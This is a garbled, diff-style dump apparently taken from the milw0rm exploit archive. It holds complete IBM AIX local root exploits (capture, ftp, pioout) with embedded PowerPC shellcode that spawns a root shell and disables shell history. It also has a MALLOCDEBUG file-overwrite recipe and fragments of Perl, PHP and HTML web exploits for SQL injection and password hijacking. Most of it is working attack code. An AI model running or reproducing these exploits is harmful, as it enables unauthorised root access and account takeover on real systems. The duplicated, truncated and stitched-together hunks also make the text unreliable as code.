||||
FD_SET(p2[0], &rset);
|
||||
|
||||
n = select(MAX(p1[0], p2[0]) + 1,
|
||||
&rset, NULL, NULL, NULL);
|
||||
if (n < 0) {
|
||||
perror("[-] select");
|
||||
break;
|
||||
}
|
||||
|
||||
if (FD_ISSET(p1[0], &rset)) {
|
||||
n = read(p1[0], buf, sizeof(buf));
|
||||
if (n <= 0) break;
|
||||
write(p1[1], buf, n);
|
||||
}
|
||||
if (FD_ISSET(p2[0], &rset)) {
|
||||
n = read(p2[0], buf, sizeof(buf));
|
||||
if (n <= 0) break;
|
||||
write(p2[1], buf, n);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/* just because you don't understand it doesn't mean it has to be wrong */
|
||||
ulong get_addr(char *argv[], char *envp[], char *args[], char *envs[])
|
||||
{
|
||||
ulong top, len, off;
|
||||
int i;
|
||||
|
||||
len = 0;
|
||||
for (i = 0; argv[i]; i++)
|
||||
len += strlen(argv[i]) + 1;
|
||||
for (i = 0; envp[i]; i++)
|
||||
len += strlen(envp[i]) + 1;
|
||||
top = (ulong) argv[0] + ALIGN(len, 8);
|
||||
|
||||
len = off = 0;
|
||||
for (i = 0; args[i]; i++)
|
||||
len += strlen(args[i]) + 1;
|
||||
for (i = 0; envs[i]; i++) {
|
||||
if (!strncmp(envs[i], "EGG=", 4))
|
||||
off = len + 4;
|
||||
len += strlen(envs[i]) + 1;
|
||||
}
|
||||
while (off & 3)
|
||||
strcat(envs[0], "X"), off++, len++;
|
||||
|
||||
return top - ALIGN(len, 4) + off;
|
||||
}
|
||||
|
||||
int main(int argc, char *argv[], char *envp[])
|
||||
{
|
||||
char pad[16] = "PAD=X", egg[512], bsh[128], buf[1024];
|
||||
char *args[] = { TARGET, "/dev/null", NULL };
|
||||
char *envs[] = { pad, bsh, egg, NULL };
|
||||
int ptm, pts, pi[2];
|
||||
pid_t child;
|
||||
ulong addr;
|
||||
|
||||
sprintf(egg, "EGG=%s/proc/%d/object/a.out|", qaazcode, getpid());
|
||||
sprintf(bsh, "SHELL=/proc/%d/object/a.out", getpid());
|
||||
addr = get_addr(argv, envp, args, envs);
|
||||
|
||||
if (!envp[0]) {
|
||||
dup2(3, 0);
|
||||
|
||||
setuid(geteuid());
|
||||
putenv("HISTFILE=/dev/null");
|
||||
execl("/bin/bash", "bash", "-i", NULL);
|
||||
execl("/bin/sh", "sh", "-i", NULL);
|
||||
perror("[-] execl");
|
||||
exit(1);
|
||||
} else if (argc && !strcmp(argv[0], "bsh")) {
|
||||
char i, ch;
|
||||
|
||||
printf("\x1b[");
|
||||
for (i = 0; i < VALCNT; i++)
|
||||
printf("%lu;", addr);
|
||||
printf("0A\n");
|
||||
fflush(stdout);
|
||||
|
||||
while (read(0, &ch, 1) == 1)
|
||||
write(1, &ch, 1);
|
||||
exit(0);
|
||||
}
|
||||
|
||||
printf("--------------------------------\n");
|
||||
printf(" AIX capture Local Root Exploit\n");
|
||||
printf(" By qaaz\n");
|
||||
printf("--------------------------------\n");
|
||||
|
||||
if (pipe(pi) < 0) {
|
||||
perror("[-] pipe");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
if ((ptm = open("/dev/ptc", O_RDWR)) < 0 ||
|
||||
(pts = open(ttyname(ptm), O_RDWR)) < 0) {
|
||||
perror("[-] pty");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
if ((child = fork()) < 0) {
|
||||
perror("[-] fork");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
if (child == 0) {
|
||||
dup2(pts, 0);
|
||||
dup2(pts, 1);
|
||||
dup2(pts, 2);
|
||||
|
||||
dup2(pi[0], 3);
|
||||
|
||||
execve(TARGET, args, envs);
|
||||
perror("[-] execve");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
close(pi[0]);
|
||||
close(pts);
|
||||
|
||||
sleep(1);
|
||||
read(ptm, buf, sizeof(buf));
|
||||
|
||||
write(ptm, " ", 1);
|
||||
shell((int[2]) { 0, pi[1] }, (int[2]) { ptm, 1 });
|
||||
kill(child, SIGTERM);
|
||||
waitpid(child, NULL, 0);
|
||||
return 0;
|
||||
}
|
||||
|
||||
// milw0rm.com [2007-07-27]
|
||||
/* 07/2007: public release
|
||||
* IBM AIX <= 5.3 sp6
|
||||
*
|
||||
* AIX capture Local Root Exploit
|
||||
* By qaaz
|
||||
*/
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
|
||||
#include <fcntl.h>
|
||||
#include <unistd.h>
|
||||
#include <sys/wait.h>
|
||||
#include <sys/select.h>
|
||||
|
||||
#define TARGET "/usr/bin/capture"
|
||||
#define VALCNT 40
|
||||
|
||||
#define MAX(x,y) ((x) > (y) ? (x) : (y))
|
||||
#define ALIGN(x,y) (((x) + (y) - 1) / (y) * (y))
|
||||
|
||||
unsigned char qaazcode[] =
|
||||
"\x60\x60\x60\x60\x60\x60\x60\x60"
|
||||
"\x7c\x63\x1a\x79\x40\x82\xff\xfd"
|
||||
"\x7e\xa8\x02\xa6\x3a\xb5\x01\x01"
|
||||
"\x88\x55\xff\x5b\x3a\xd5\xff\x1b"
|
||||
"\x7e\xc8\x03\xa6\x4c\xc6\x33\x42"
|
||||
"\x44\xff\xff\x02\x38\x75\xff\x5f"
|
||||
"\x38\x63\x01\x01\x88\x95\xff\x5d"
|
||||
"\x38\x63\x01\x02\x38\x63\xfe\xff"
|
||||
"\x88\xa3\xfe\xff\x7c\x04\x28\x40"
|
||||
"\x40\x82\xff\xf0\x7c\xa5\x2a\x78"
|
||||
"\x98\xa3\xfe\xff\x88\x55\xff\x5c"
|
||||
"\x38\x75\xff\x5f\x38\x81\xff\xf8"
|
||||
"\x90\x61\xff\xf8\x90\xa1\xff\xfc"
|
||||
"\x4b\xff\xff\xbd\xb8\x05\x7c\xff";
|
||||
|
||||
void shell(int p1[2], int p2[2])
|
||||
{
|
||||
ssize_t n;
|
||||
fd_set rset;
|
||||
char buf[4096];
|
||||
|
||||
for (;;) {
|
||||
FD_ZERO(&rset);
|
||||
FD_SET(p1[0], &rset);
|
||||
FD_SET(p2[0], &rset);
|
||||
|
||||
n = select(MAX(p1[0], p2[0]) + 1,
|
||||
&rset, NULL, NULL, NULL);
|
||||
if (n < 0) {
|
||||
perror("[-] select");
|
||||
break;
|
||||
}
|
||||
|
||||
if (FD_ISSET(p1[0], &rset)) {
|
||||
n = read(p1[0], buf, sizeof(buf));
|
||||
if (n <= 0) break;
|
||||
write(p1[1], buf, n);
|
||||
}
|
||||
if (FD_ISSET(p2[0], &rset)) {
|
||||
n = read(p2[0], buf, sizeof(buf));
|
||||
if (n <= 0) break;
|
||||
write(p2[1], buf, n);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/* just because you don't understand it doesn't mean it has to be wrong */
|
||||
ulong get_addr(char *argv[], char *envp[], char *args[], char *envs[])
|
||||
{
|
||||
ulong top, len, off;
|
||||
int i;
|
||||
|
||||
len = 0;
|
||||
for (i = 0; argv[i]; i++)
|
||||
len += strlen(argv[i]) + 1;
|
||||
for (i = 0; envp[i]; i++)
|
||||
len += strlen(envp[i]) + 1;
|
||||
top = (ulong) argv[0] + ALIGN(len, 8);
|
||||
|
||||
len = off = 0;
|
||||
for (i = 0; args[i]; i++)
|
||||
len += strlen(args[i]) + 1;
|
||||
for (i = 0; envs[i]; i++) {
|
||||
if (!strncmp(envs[i], "EGG=", 4))
|
||||
off = len + 4;
|
||||
len += strlen(envs[i]) + 1;
|
||||
}
|
||||
while (off & 3)
|
||||
strcat(envs[0], "X"), off++, len++;
|
||||
|
||||
return top - ALIGN(len, 4) + off;
|
||||
}
|
||||
|
||||
int main(int argc, char *argv[], char *envp[])
|
||||
{
|
||||
char pad[16] = "PAD=X", egg[512], bsh[128], buf[1024];
|
||||
char *args[] = { TARGET, "/dev/null", NULL };
|
||||
char *envs[] = { pad, bsh, egg, NULL };
|
||||
int ptm, pts, pi[2];
|
||||
pid_t child;
|
||||
ulong addr;
|
||||
|
||||
sprintf(egg, "EGG=%s/proc/%d/object/a.out|", qaazcode, getpid());
|
||||
sprintf(bsh, "SHELL=/proc/%d/object/a.out", getpid());
|
||||
addr = get_addr(argv, envp, args, envs);
|
||||
|
||||
if (!envp[0]) {
|
||||
dup2(3, 0);
|
||||
|
||||
setuid(geteuid());
|
||||
putenv("HISTFILE=/dev/null");
|
||||
execl("/bin/bash", "bash", "-i", NULL);
|
||||
execl("/bin/sh", "sh", "-i", NULL);
|
||||
perror("[-] execl");
|
||||
exit(1);
|
||||
} else if (argc && !strcmp(argv[0], "bsh")) {
|
||||
char i, ch;
|
||||
|
||||
printf("\x1b[");
|
||||
for (i = 0; i < VALCNT; i++)
|
||||
printf("%lu;", addr);
|
||||
printf("0A\n");
|
||||
fflush(stdout);
|
||||
|
||||
while (read(0, &ch, 1) == 1)
|
||||
write(1, &ch, 1);
|
||||
exit(0);
|
||||
}
|
||||
|
||||
printf("--------------------------------\n");
|
||||
printf(" AIX capture Local Root Exploit\n");
|
||||
printf(" By qaaz\n");
|
||||
printf("--------------------------------\n");
|
||||
|
||||
if (pipe(pi) < 0) {
|
||||
perror("[-] pipe");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
if ((ptm = open("/dev/ptc", O_RDWR)) < 0 ||
|
||||
(pts = open(ttyname(ptm), O_RDWR)) < 0) {
|
||||
perror("[-] pty");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
if ((child = fork()) < 0) {
|
||||
perror("[-] fork");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
if (child == 0) {
|
||||
dup2(pts, 0);
|
||||
dup2(pts, 1);
|
||||
dup2(pts, 2);
|
||||
|
||||
dup2(pi[0], 3);
|
||||
|
||||
execve(TARGET, args, envs);
|
||||
perror("[-] execve");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
close(pi[0]);
|
||||
close(pts);
|
||||
|
||||
sleep(1);
|
||||
read(ptm, buf, sizeof(buf));
|
||||
|
||||
write(ptm, " ", 1);
|
||||
shell((int[2]) { 0, pi[1] }, (int[2]) { ptm, 1 });
|
||||
kill(child, SIGTERM);
|
||||
waitpid(child, NULL, 0);
|
||||
return 0;
|
||||
}
|
||||
|
||||
// milw0rm.com [2007-07-27]
|
||||
|
|
|
@ -1,29 +1,29 @@
|
|||
#!/bin/sh
|
||||
#
|
||||
# 07/2007: public release
|
||||
# IBM AIX <= 5.3 sp6
|
||||
#
|
||||
echo "-------------------------------"
|
||||
echo " AIX pioout Local Root Exploit "
|
||||
echo " By qaaz"
|
||||
echo "-------------------------------"
|
||||
cat >piolib.c <<_EOF_
|
||||
#include <stdlib.h>
|
||||
#include <unistd.h>
|
||||
void init() __attribute__ ((constructor));
|
||||
void init()
|
||||
{
|
||||
seteuid(0);
|
||||
setuid(0);
|
||||
putenv("HISTFILE=/dev/null");
|
||||
execl("/bin/bash", "bash", "-i", (void *) 0);
|
||||
execl("/bin/sh", "sh", "-i", (void *) 0);
|
||||
perror("execl");
|
||||
exit(1);
|
||||
}
|
||||
_EOF_
|
||||
gcc piolib.c -o piolib -shared -fPIC
|
||||
[ -r piolib ] && /usr/lpd/pio/etc/pioout -R ./piolib
|
||||
rm -f piolib.c piolib
|
||||
|
||||
# milw0rm.com [2007-07-27]
|
||||
#!/bin/sh
|
||||
#
|
||||
# 07/2007: public release
|
||||
# IBM AIX <= 5.3 sp6
|
||||
#
|
||||
echo "-------------------------------"
|
||||
echo " AIX pioout Local Root Exploit "
|
||||
echo " By qaaz"
|
||||
echo "-------------------------------"
|
||||
cat >piolib.c <<_EOF_
|
||||
#include <stdlib.h>
|
||||
#include <unistd.h>
|
||||
void init() __attribute__ ((constructor));
|
||||
void init()
|
||||
{
|
||||
seteuid(0);
|
||||
setuid(0);
|
||||
putenv("HISTFILE=/dev/null");
|
||||
execl("/bin/bash", "bash", "-i", (void *) 0);
|
||||
execl("/bin/sh", "sh", "-i", (void *) 0);
|
||||
perror("execl");
|
||||
exit(1);
|
||||
}
|
||||
_EOF_
|
||||
gcc piolib.c -o piolib -shared -fPIC
|
||||
[ -r piolib ] && /usr/lpd/pio/etc/pioout -R ./piolib
|
||||
rm -f piolib.c piolib
|
||||
|
||||
# milw0rm.com [2007-07-27]
|
||||
|
|
|
@ -1,157 +1,157 @@
|
|||
/* 07/2007: public release
|
||||
* IBM AIX <= 5.3 sp6
|
||||
*
|
||||
* AIX ftp Local Root Exploit
|
||||
* By qaaz
|
||||
*/
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
|
||||
#include <unistd.h>
|
||||
#include <sys/wait.h>
|
||||
#include <sys/select.h>
|
||||
|
||||
#define TARGET "/usr/bin/ftp"
|
||||
#define OVERLEN 300
|
||||
|
||||
#define MAX(x,y) ((x) > (y) ? (x) : (y))
|
||||
#define ALIGN(x,y) (((x) + (y) - 1) / (y) * (y))
|
||||
|
||||
unsigned char qaazcode[] =
|
||||
"\x60\x60\x60\x60\x60\x60\x60\x60"
|
||||
"\x7c\x63\x1a\x79\x40\x82\xff\xfd"
|
||||
"\x7e\xa8\x02\xa6\x3a\xb5\x01\x01"
|
||||
"\x88\x55\xff\x5b\x3a\xd5\xff\x1b"
|
||||
"\x7e\xc8\x03\xa6\x4c\xc6\x33\x42"
|
||||
"\x44\xff\xff\x02\x38\x75\xff\x5f"
|
||||
"\x38\x63\x01\x01\x88\x95\xff\x5d"
|
||||
"\x38\x63\x01\x02\x38\x63\xfe\xff"
|
||||
"\x88\xa3\xfe\xff\x7c\x04\x28\x40"
|
||||
"\x40\x82\xff\xf0\x7c\xa5\x2a\x78"
|
||||
"\x98\xa3\xfe\xff\x88\x55\xff\x5c"
|
||||
"\x38\x75\xff\x5f\x38\x81\xff\xf8"
|
||||
"\x90\x61\xff\xf8\x90\xa1\xff\xfc"
|
||||
"\x4b\xff\xff\xbd\xb8\x05\x7c\xff";
|
||||
|
||||
void shell(int p1[2], int p2[2])
|
||||
{
|
||||
ssize_t n;
|
||||
fd_set rset;
|
||||
char buf[4096];
|
||||
|
||||
for (;;) {
|
||||
FD_ZERO(&rset);
|
||||
FD_SET(p1[0], &rset);
|
||||
FD_SET(p2[0], &rset);
|
||||
|
||||
n = select(MAX(p1[0], p2[0]) + 1,
|
||||
&rset, NULL, NULL, NULL);
|
||||
if (n < 0) {
|
||||
perror("[-] select");
|
||||
break;
|
||||
}
|
||||
|
||||
if (FD_ISSET(p1[0], &rset)) {
|
||||
n = read(p1[0], buf, sizeof(buf));
|
||||
if (n <= 0) break;
|
||||
write(p1[1], buf, n);
|
||||
}
|
||||
if (FD_ISSET(p2[0], &rset)) {
|
||||
n = read(p2[0], buf, sizeof(buf));
|
||||
if (n <= 0) break;
|
||||
write(p2[1], buf, n);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/* just because you don't understand it doesn't mean it has to be wrong */
|
||||
ulong get_addr(char *argv[], char *envp[], char *args[], char *envs[])
|
||||
{
|
||||
ulong top, len, off;
|
||||
int i;
|
||||
|
||||
len = 0;
|
||||
for (i = 0; argv[i]; i++)
|
||||
len += strlen(argv[i]) + 1;
|
||||
for (i = 0; envp[i]; i++)
|
||||
len += strlen(envp[i]) + 1;
|
||||
top = (ulong) argv[0] + ALIGN(len, 8);
|
||||
|
||||
len = off = 0;
|
||||
for (i = 0; args[i]; i++)
|
||||
len += strlen(args[i]) + 1;
|
||||
for (i = 0; envs[i]; i++) {
|
||||
if (!strncmp(envs[i], "EGG=", 4))
|
||||
off = len + 4;
|
||||
len += strlen(envs[i]) + 1;
|
||||
}
|
||||
while (off & 3)
|
||||
strcat(envs[0], "X"), off++, len++;
|
||||
|
||||
return top - ALIGN(len, 4) + off;
|
||||
}
|
||||
|
||||
int main(int argc, char *argv[], char *envp[])
|
||||
{
|
||||
char pad[16] = "PAD=X", egg[512];
|
||||
char *args[] = { TARGET, NULL };
|
||||
char *envs[] = { pad, egg, NULL };
|
||||
int pi[2], po[2], i;
|
||||
pid_t child;
|
||||
ulong addr;
|
||||
|
||||
sprintf(egg, "EGG=%s/proc/%d/object/a.out|", qaazcode, getpid());
|
||||
|
||||
if (!envp[0]) {
|
||||
setuid(geteuid());
|
||||
putenv("HISTFILE=/dev/null");
|
||||
execl("/bin/bash", "bash", "-i", NULL);
|
||||
execl("/bin/sh", "sh", "-i", NULL);
|
||||
perror("[-] execl");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
printf("----------------------------\n");
|
||||
printf(" AIX ftp Local Root Exploit\n");
|
||||
printf(" By qaaz\n");
|
||||
printf("----------------------------\n");
|
||||
|
||||
if (pipe(pi) < 0 || pipe(po) < 0) {
|
||||
perror("[-] pipe");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
addr = get_addr(argv, envp, args, envs);
|
||||
|
||||
if ((child = fork()) < 0) {
|
||||
perror("[-] fork");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
if (child == 0) {
|
||||
dup2(pi[0], 0);
|
||||
dup2(po[1], 1);
|
||||
dup2(po[1], 2);
|
||||
execve(TARGET, args, envs);
|
||||
perror("[-] execve");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
write(pi[1], "macdef foo\n\n$\nfoo ab", 20);
|
||||
for (i = 0; i < OVERLEN; i += sizeof(addr))
|
||||
write(pi[1], &addr, sizeof(addr));
|
||||
write(pi[1], "\n", 1);
|
||||
|
||||
fflush(stdout);
|
||||
fflush(stderr);
|
||||
|
||||
close(pi[0]);
|
||||
close(po[1]);
|
||||
shell((int[2]) { 0, pi[1] }, (int[2]) { po[0], 1 });
|
||||
kill(child, SIGTERM);
|
||||
waitpid(child, NULL, 0);
|
||||
return 0;
|
||||
}
|
||||
|
||||
// milw0rm.com [2007-07-27]
|
||||
/* 07/2007: public release
|
||||
* IBM AIX <= 5.3 sp6
|
||||
*
|
||||
* AIX ftp Local Root Exploit
|
||||
* By qaaz
|
||||
*/
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
|
||||
#include <unistd.h>
|
||||
#include <sys/wait.h>
|
||||
#include <sys/select.h>
|
||||
|
||||
#define TARGET "/usr/bin/ftp"
|
||||
#define OVERLEN 300
|
||||
|
||||
#define MAX(x,y) ((x) > (y) ? (x) : (y))
|
||||
#define ALIGN(x,y) (((x) + (y) - 1) / (y) * (y))
|
||||
|
||||
unsigned char qaazcode[] =
|
||||
"\x60\x60\x60\x60\x60\x60\x60\x60"
|
||||
"\x7c\x63\x1a\x79\x40\x82\xff\xfd"
|
||||
"\x7e\xa8\x02\xa6\x3a\xb5\x01\x01"
|
||||
"\x88\x55\xff\x5b\x3a\xd5\xff\x1b"
|
||||
"\x7e\xc8\x03\xa6\x4c\xc6\x33\x42"
|
||||
"\x44\xff\xff\x02\x38\x75\xff\x5f"
|
||||
"\x38\x63\x01\x01\x88\x95\xff\x5d"
|
||||
"\x38\x63\x01\x02\x38\x63\xfe\xff"
|
||||
"\x88\xa3\xfe\xff\x7c\x04\x28\x40"
|
||||
"\x40\x82\xff\xf0\x7c\xa5\x2a\x78"
|
||||
"\x98\xa3\xfe\xff\x88\x55\xff\x5c"
|
||||
"\x38\x75\xff\x5f\x38\x81\xff\xf8"
|
||||
"\x90\x61\xff\xf8\x90\xa1\xff\xfc"
|
||||
"\x4b\xff\xff\xbd\xb8\x05\x7c\xff";
|
||||
|
||||
void shell(int p1[2], int p2[2])
|
||||
{
|
||||
ssize_t n;
|
||||
fd_set rset;
|
||||
char buf[4096];
|
||||
|
||||
for (;;) {
|
||||
FD_ZERO(&rset);
|
||||
FD_SET(p1[0], &rset);
|
||||
FD_SET(p2[0], &rset);
|
||||
|
||||
n = select(MAX(p1[0], p2[0]) + 1,
|
||||
&rset, NULL, NULL, NULL);
|
||||
if (n < 0) {
|
||||
perror("[-] select");
|
||||
break;
|
||||
}
|
||||
|
||||
if (FD_ISSET(p1[0], &rset)) {
|
||||
n = read(p1[0], buf, sizeof(buf));
|
||||
if (n <= 0) break;
|
||||
write(p1[1], buf, n);
|
||||
}
|
||||
if (FD_ISSET(p2[0], &rset)) {
|
||||
n = read(p2[0], buf, sizeof(buf));
|
||||
if (n <= 0) break;
|
||||
write(p2[1], buf, n);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/* just because you don't understand it doesn't mean it has to be wrong */
|
||||
ulong get_addr(char *argv[], char *envp[], char *args[], char *envs[])
|
||||
{
|
||||
ulong top, len, off;
|
||||
int i;
|
||||
|
||||
len = 0;
|
||||
for (i = 0; argv[i]; i++)
|
||||
len += strlen(argv[i]) + 1;
|
||||
for (i = 0; envp[i]; i++)
|
||||
len += strlen(envp[i]) + 1;
|
||||
top = (ulong) argv[0] + ALIGN(len, 8);
|
||||
|
||||
len = off = 0;
|
||||
for (i = 0; args[i]; i++)
|
||||
len += strlen(args[i]) + 1;
|
||||
for (i = 0; envs[i]; i++) {
|
||||
if (!strncmp(envs[i], "EGG=", 4))
|
||||
off = len + 4;
|
||||
len += strlen(envs[i]) + 1;
|
||||
}
|
||||
while (off & 3)
|
||||
strcat(envs[0], "X"), off++, len++;
|
||||
|
||||
return top - ALIGN(len, 4) + off;
|
||||
}
|
||||
|
||||
int main(int argc, char *argv[], char *envp[])
|
||||
{
|
||||
char pad[16] = "PAD=X", egg[512];
|
||||
char *args[] = { TARGET, NULL };
|
||||
char *envs[] = { pad, egg, NULL };
|
||||
int pi[2], po[2], i;
|
||||
pid_t child;
|
||||
ulong addr;
|
||||
|
||||
sprintf(egg, "EGG=%s/proc/%d/object/a.out|", qaazcode, getpid());
|
||||
|
||||
if (!envp[0]) {
|
||||
setuid(geteuid());
|
||||
putenv("HISTFILE=/dev/null");
|
||||
execl("/bin/bash", "bash", "-i", NULL);
|
||||
execl("/bin/sh", "sh", "-i", NULL);
|
||||
perror("[-] execl");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
printf("----------------------------\n");
|
||||
printf(" AIX ftp Local Root Exploit\n");
|
||||
printf(" By qaaz\n");
|
||||
printf("----------------------------\n");
|
||||
|
||||
if (pipe(pi) < 0 || pipe(po) < 0) {
|
||||
perror("[-] pipe");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
addr = get_addr(argv, envp, args, envs);
|
||||
|
||||
if ((child = fork()) < 0) {
|
||||
perror("[-] fork");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
if (child == 0) {
|
||||
dup2(pi[0], 0);
|
||||
dup2(po[1], 1);
|
||||
dup2(po[1], 2);
|
||||
execve(TARGET, args, envs);
|
||||
perror("[-] execve");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
write(pi[1], "macdef foo\n\n$\nfoo ab", 20);
|
||||
for (i = 0; i < OVERLEN; i += sizeof(addr))
|
||||
write(pi[1], &addr, sizeof(addr));
|
||||
write(pi[1], "\n", 1);
|
||||
|
||||
fflush(stdout);
|
||||
fflush(stderr);
|
||||
|
||||
close(pi[0]);
|
||||
close(po[1]);
|
||||
shell((int[2]) { 0, pi[1] }, (int[2]) { po[0], 1 });
|
||||
kill(child, SIGTERM);
|
||||
waitpid(child, NULL, 0);
|
||||
return 0;
|
||||
}
|
||||
|
||||
// milw0rm.com [2007-07-27]
|
||||
|
|
|
@ -20,6 +20,6 @@ export PATH
|
|||
/usr/sbin/invscout
|
||||
PATH="/usr/bin:/usr/sbin:/usr/local/bin:/bin:./"
|
||||
export PATH
|
||||
exec /tmp/ksh
|
||||
|
||||
# milw0rm.com [2005-03-25]
|
||||
exec /tmp/ksh
|
||||
|
||||
# milw0rm.com [2005-03-25]
|
||||
|
|
|
@ -1,33 +1,33 @@
|
|||
#!/bin/bash
|
||||
#################################################################
|
||||
# _______ _________ _ #
|
||||
# ( ____ )\__ __/( ( /| #
|
||||
# | ( )| ) ( | \ ( | #
|
||||
# | (____)| | | | \ | | #
|
||||
# | __) | | | (\ \) | #
|
||||
# | (\ ( | | | | \ | #
|
||||
# | ) \ \__ | | | ) \ | #
|
||||
# |/ \__/ )_( |/ )_) #
|
||||
# http://root-the.net #
|
||||
#################################################################
|
||||
#[+] IBM AIX libc MALLOCDEBUG File Overwrite Vulnerability #
|
||||
#[+] Refer : securitytracker.com/id?1022261 #
|
||||
#[+] Exploit : Affix <root@root-the.net> #
|
||||
#[+] Tested on : IBM AIX #
|
||||
#[+] Greetz : Mad-Hatter, Atomiku, RTN, Terogen, SCD, Boxhead, #
|
||||
# str0ke, tekto, SonicX, Android, tw0, d0nk, Redskull #
|
||||
# AIX 5.3 ML 5 is where this bad libc code was added. #
|
||||
# Libs Affected : #
|
||||
# /usr/ccs/lib/libc.a #
|
||||
# /usr/ccs/lib/libp/libc.a #
|
||||
#################################################################
|
||||
|
||||
Set the following environment variables:
|
||||
|
||||
umask 000
|
||||
MALLOCTYPE=debug
|
||||
MALLOCDEBUG=report_allocations,output:/bin/filename
|
||||
|
||||
echo "Now run any setuid root binary.. /bin/filename will be created with 777 permissions."
|
||||
|
||||
# milw0rm.com [2009-07-30]
|
||||
#!/bin/bash
|
||||
#################################################################
|
||||
# _______ _________ _ #
|
||||
# ( ____ )\__ __/( ( /| #
|
||||
# | ( )| ) ( | \ ( | #
|
||||
# | (____)| | | | \ | | #
|
||||
# | __) | | | (\ \) | #
|
||||
# | (\ ( | | | | \ | #
|
||||
# | ) \ \__ | | | ) \ | #
|
||||
# |/ \__/ )_( |/ )_) #
|
||||
# http://root-the.net #
|
||||
#################################################################
|
||||
#[+] IBM AIX libc MALLOCDEBUG File Overwrite Vulnerability #
|
||||
#[+] Refer : securitytracker.com/id?1022261 #
|
||||
#[+] Exploit : Affix <root@root-the.net> #
|
||||
#[+] Tested on : IBM AIX #
|
||||
#[+] Greetz : Mad-Hatter, Atomiku, RTN, Terogen, SCD, Boxhead, #
|
||||
# str0ke, tekto, SonicX, Android, tw0, d0nk, Redskull #
|
||||
# AIX 5.3 ML 5 is where this bad libc code was added. #
|
||||
# Libs Affected : #
|
||||
# /usr/ccs/lib/libc.a #
|
||||
# /usr/ccs/lib/libp/libc.a #
|
||||
#################################################################
|
||||
|
||||
Set the following environment variables:
|
||||
|
||||
umask 000
|
||||
MALLOCTYPE=debug
|
||||
MALLOCDEBUG=report_allocations,output:/bin/filename
|
||||
|
||||
echo "Now run any setuid root binary.. /bin/filename will be created with 777 permissions."
|
||||
|
||||
# milw0rm.com [2009-07-30]
|
||||
|
|
|
@ -35,6 +35,6 @@ unsigned int code[]={
|
|||
80010444 lwz r0,1092(SP) --jump
|
||||
7c0903a6 mtspr CTR,r0
|
||||
4e800420 bctr --jump
|
||||
*/
|
||||
|
||||
*/
|
||||
|
||||
# milw0rm.com [2004-09-26]
|
|
@ -71,6 +71,6 @@ print "User: admin\n";
|
|||
print "Pass: trapset\n\n";
|
||||
print "Enjoy ;)\n";
|
||||
print "\n";
|
||||
### EOF ###
|
||||
|
||||
# milw0rm.com [2005-05-26]
|
||||
### EOF ###
|
||||
|
||||
# milw0rm.com [2005-05-26]
|
||||
|
|
|
@ -30,6 +30,6 @@ print "Member key: <input name=\"memKey\" type=\"text\" value=\"foo') or M_Name=
|
|||
print "<input name=\"Submit\" type=\"submit\" value=\":::Change Pass:::\">";
|
||||
print "</form>";
|
||||
}
|
||||
?>
|
||||
|
||||
# milw0rm.com [2005-05-26]
|
||||
?>
|
||||
|
||||
# milw0rm.com [2005-05-26]
|
||||
|
|
|
@ -33,6 +33,6 @@ size="150">
|
|||
<br>
|
||||
<input name="Submit" type="submit" value="Submit">
|
||||
</form>
|
||||
-----------------End-------------------
|
||||
|
||||
# milw0rm.com [2005-05-26]
|
||||
-----------------End-------------------
|
||||
|
||||
# milw0rm.com [2005-05-26]
|
||||
|
|
|
@ -32,6 +32,6 @@ firstname : <input name="firstname" value="Crkchat" type="text" size="50">
|
|||
|
||||
<!--
|
||||
-----------------------------------
|
||||
Now u can use forgot password to gain passwords! -->
|
||||
|
||||
# milw0rm.com [2005-05-27]
|
||||
Now u can use forgot password to gain passwords! -->
|
||||
|
||||
# milw0rm.com [2005-05-27]
|
||||
|
|
|
@ -47,6 +47,6 @@ print "Wait For Changing Password ...\n";
|
|||
print "[+]OK , Now Login With : \n";
|
||||
print "Username: trapset\n";
|
||||
print "Password: trapset\n\n";
|
||||
|
||||
|
||||
# milw0rm.com [2005-06-27]
|
||||
|
||||
|
||||
# milw0rm.com [2005-06-27]
|
||||
|
|
|
@ -23,6 +23,6 @@ $page=~m/the varchar value '(.*?)' to a column/ && print "[+] Username of admin
|
|||
print "[-] Unable to retrieve Username\n" if(!$1);
|
||||
$page=get($ARGV[0]."module/support/task/comment_post.asp?TaskID=Password") || die "[-] Unable to retrieve: $!";
|
||||
$page=~m/the varchar value '(.*?)' to a column/ && print "[+] SHA256 hash of password is: $1\n";
|
||||
print "[-] Unable to retrieve hash of password\n" if(!$1);
|
||||
|
||||
# milw0rm.com [2005-06-27]
|
||||
print "[-] Unable to retrieve hash of password\n" if(!$1);
|
||||
|
||||
# milw0rm.com [2005-06-27]
|
||||
|
|
|
@ -104,6 +104,6 @@ hostcustid: <input type="TEXT" name="hostcustid" ID="hostcustid" value="1"><tr>
|
|||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</form>
|
||||
|
||||
# milw0rm.com [2005-07-18]
|
||||
</form>
|
||||
|
||||
# milw0rm.com [2005-07-18]
|
||||
|
|
|
@ -1,44 +1,44 @@
|
|||
<!--
|
||||
Save this code as .htm and replace [SITE]/[SQLCODE] to your server address
|
||||
|
||||
Some SQL Examples:
|
||||
|
||||
-Changing character data-
|
||||
